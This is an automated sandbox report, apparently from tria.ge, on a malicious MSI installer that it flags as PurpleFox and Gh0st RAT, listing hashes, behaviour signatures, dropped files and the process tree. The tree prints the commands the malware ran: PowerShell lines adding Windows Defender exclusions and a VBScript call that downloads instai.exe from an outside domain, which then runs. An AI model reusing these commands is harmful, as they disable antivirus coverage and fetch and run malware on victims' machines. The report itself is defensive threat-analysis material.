Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    133s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/09/2024, 08:11

General

  • Target

    zuixinaisi.msi

  • Size

    233.8MB

  • MD5

    df0ddca33d18cef60dbfdad992a21ff3

  • SHA1

    5db0a225c9713d93412d01c5df5398811e54d1e5

  • SHA256

    8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b

  • SHA512

    e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda

  • SSDEEP

    6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD

Malware Config

Signatures

  • Detect PurpleFox Rootkit 1 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3040
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4652
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:644
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 9781470C31F07C43A7C9ADE697C0B704
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:112
      • C:\Windows\Installer\MSID09F.tmp
        "C:\Windows\Installer\MSID09F.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Access Token Manipulation: Create Process with Token
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:5048
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4808
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\ProgramData
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4564
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
            4⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            PID:2808
          • C:\ProgramData\instai.exe
            C:/ProgramData/instai.exe
            4⤵
            • Enumerates connected drives
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:3484
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:4544

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e58c765.rbs

      Filesize

      8KB

      MD5

      b9e0793acf2cab3acdae1376e71b88fc

      SHA1

      cbaa88dfa1b9026c3325d1d8b774786d9966a88d

      SHA256

      fe9b8bb495ede5eafa0b17a114ef3e47e84dfec2b2c51117dd5b5218626573e1

      SHA512

      20828ea6603ac4feb64bea2901b4f457e6a7a75c6c884d37a24f222536f5fa5a57086068737d805e9d0d14aedcdbae933b7d12c34b435ef8154036f461c2335e

    • C:\ProgramData\DownloadFile.vbs

      Filesize

      407B

      MD5

      2ff09853906bcaed82ddb57baca8eb1f

      SHA1

      95bf628e54a9eff2ac434fedc78193846def0139

      SHA256

      591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795

      SHA512

      b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740

    • C:\ProgramData\i4Tools8.bat

      Filesize

      1KB

      MD5

      10e4067312ac3173043783d46c328a99

      SHA1

      ec03017d71370619f553cd77b615ef6e2c781ff3

      SHA256

      048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf

      SHA512

      1f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      d14a1ef6ec7803a9a20c73d916e235b1

      SHA1

      5c6fec8d4531fb4240cd064197cdf05e53e09dd4

      SHA256

      0d3979b1f41879e417cf467eea8639d5d409bbbba49b0dabe6c9f0e5ab053b71

      SHA512

      339b6ad8db6b33912e4f50380047946a51e3e4ce6ea6332997467ae8322f96e5e8d501c44c26617716aad7ff3cff8ccdce24a18d78e92de4cd142b68727c96ad

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbthmjnf.sv5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\Installer\MSIC86C.tmp

      Filesize

      587KB

      MD5

      c7fbd5ee98e32a77edf1156db3fca622

      SHA1

      3e534fc55882e9fb940c9ae81e6f8a92a07125a0

      SHA256

      e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6

      SHA512

      8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

    • C:\Windows\Installer\MSID09F.tmp

      Filesize

      419KB

      MD5

      cac0eaeb267d81cf3fa968ee23a6af9d

      SHA1

      cf6ae8e44fb4949d5f0b01b110eaba49d39270a2

      SHA256

      f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774

      SHA512

      8edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

      Filesize

      23.7MB

      MD5

      2097108849978c6e9f1fc140c871858c

      SHA1

      5ce14933e0a1d45745e636b96533638278746553

      SHA256

      c30765d285fe45cab3ea9417df3fbdccfcf64da4b255595dfdf86b9e361881f6

      SHA512

      2fcbe024e4d1bd41f0f1e4808f449877d9b22da9cc43afcddf6016e7b2a704a2d53bd27301cc24ad5335d1f3fe0c4a2dc901f7bb9a9e611c29b4701b542b2eda

    • \??\Volume{ff3ab8f7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5c1d19d8-22dc-4561-bf1b-3b776a81e0e6}_OnDiskSnapshotProp

      Filesize

      6KB

      MD5

      861e5be968c22b0376a9c435c6b16ebc

      SHA1

      9d2a0609ca3b055a3ac7d10500527aa093947a23

      SHA256

      21404338dff1c4fd1cf709aacbba4c4e42ea436f8947f441710b37bd062bc52f

      SHA512

      47adb6ad7a7dc3b483500bec0ca0a73713c985f077d7b93f3ebbf4dbe8fb8f78c97086034fe99803644fce32aba22eccfc3eae1493d0bb9cb108ac946c757dcd

    • memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp

      Filesize

      1.6MB

    • memory/4564-100-0x0000000005610000-0x0000000005964000-memory.dmp

      Filesize

      3.3MB

    • memory/4564-102-0x0000000005D20000-0x0000000005D6C000-memory.dmp

      Filesize

      304KB

    • memory/4564-115-0x0000000007260000-0x0000000007274000-memory.dmp

      Filesize

      80KB

    • memory/4564-114-0x0000000007230000-0x0000000007241000-memory.dmp

      Filesize

      68KB

    • memory/4564-113-0x0000000006E30000-0x0000000006ED3000-memory.dmp

      Filesize

      652KB

    • memory/4564-103-0x0000000070350000-0x000000007039C000-memory.dmp

      Filesize

      304KB

    • memory/4808-80-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

      Filesize

      104KB

    • memory/4808-41-0x0000000005500000-0x0000000005854000-memory.dmp

      Filesize

      3.3MB

    • memory/4808-81-0x0000000006E70000-0x0000000006E7A000-memory.dmp

      Filesize

      40KB

    • memory/4808-82-0x0000000007070000-0x0000000007106000-memory.dmp

      Filesize

      600KB

    • memory/4808-83-0x0000000006FF0000-0x0000000007001000-memory.dmp

      Filesize

      68KB

    • memory/4808-84-0x0000000007020000-0x000000000702E000-memory.dmp

      Filesize

      56KB

    • memory/4808-85-0x0000000007030000-0x0000000007044000-memory.dmp

      Filesize

      80KB

    • memory/4808-86-0x0000000007130000-0x000000000714A000-memory.dmp

      Filesize

      104KB

    • memory/4808-87-0x0000000007110000-0x0000000007118000-memory.dmp

      Filesize

      32KB

    • memory/4808-64-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

      Filesize

      120KB

    • memory/4808-39-0x0000000004DD0000-0x0000000004E36000-memory.dmp

      Filesize

      408KB

    • memory/4808-65-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

      Filesize

      304KB

    • memory/4808-79-0x0000000007440000-0x0000000007ABA000-memory.dmp

      Filesize

      6.5MB

    • memory/4808-78-0x0000000006AD0000-0x0000000006B73000-memory.dmp

      Filesize

      652KB

    • memory/4808-77-0x0000000006090000-0x00000000060AE000-memory.dmp

      Filesize

      120KB

    • memory/4808-67-0x0000000074E10000-0x0000000074E5C000-memory.dmp

      Filesize

      304KB

    • memory/4808-66-0x0000000006A90000-0x0000000006AC2000-memory.dmp

      Filesize

      200KB

    • memory/4808-40-0x0000000004E40000-0x0000000004EA6000-memory.dmp

      Filesize

      408KB

    • memory/4808-38-0x0000000004B30000-0x0000000004B52000-memory.dmp

      Filesize

      136KB

    • memory/4808-37-0x0000000004ED0000-0x00000000054F8000-memory.dmp

      Filesize

      6.2MB

    • memory/4808-36-0x00000000021D0000-0x0000000002206000-memory.dmp

      Filesize

      216KB